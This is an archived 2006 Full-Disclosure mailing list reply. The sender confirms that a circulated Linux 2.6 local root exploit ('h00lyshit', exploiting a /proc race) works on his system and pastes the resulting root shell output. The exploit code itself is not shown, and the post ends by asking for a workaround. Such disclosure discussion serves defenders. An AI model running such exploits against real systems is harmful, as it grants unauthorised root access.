lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri Jul 14 22:54:15 2006
From: dan-fd at f-box.org (Dan B)
Subject: Linux kernel 0day - dynamite inside,	don't
	burn your fingers

Hello,

Joanna R. wrote:
> Hello,
>
> attached 0day kernel 2.6 local root exploit. This is a new genuine
> bug,  unpatched in 2.6.17.4 - don't get confused by prctl inside - it
> is only used to change process status.
Tested on

dan@...ox ~ $ uname -a
Linux n-box 2.6.16-gentoo-r9 #1 Fri Jun 9 16:44:22 CEST 2006 i686
Intel(R) Pentium(R) M processor 2.00GHz GNU/Linux

dan@...ox ~ $ ./h00lyshit ./Media/Audio/DnB/TheEngineer_060331.mp3

preparing
trying to exploit ./Media/Audio/DnB/TheEngineer_060331.mp3

sh-3.1# id
uid=0(root) gid=100(users) groups=7(lp),10(wheel),18(audio),27(video),35(games),81(apache),100(users),7353(svnusers)
sh-3.1# whoami
root
sh-3.1#


> The code exploits a root race in /proc

So it does :)
>
> have a nice day.

But this means that I've gotta worry about more servers now! Dam it!

And is there a workaround to protect against this attack?


Cheers,
Dan.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ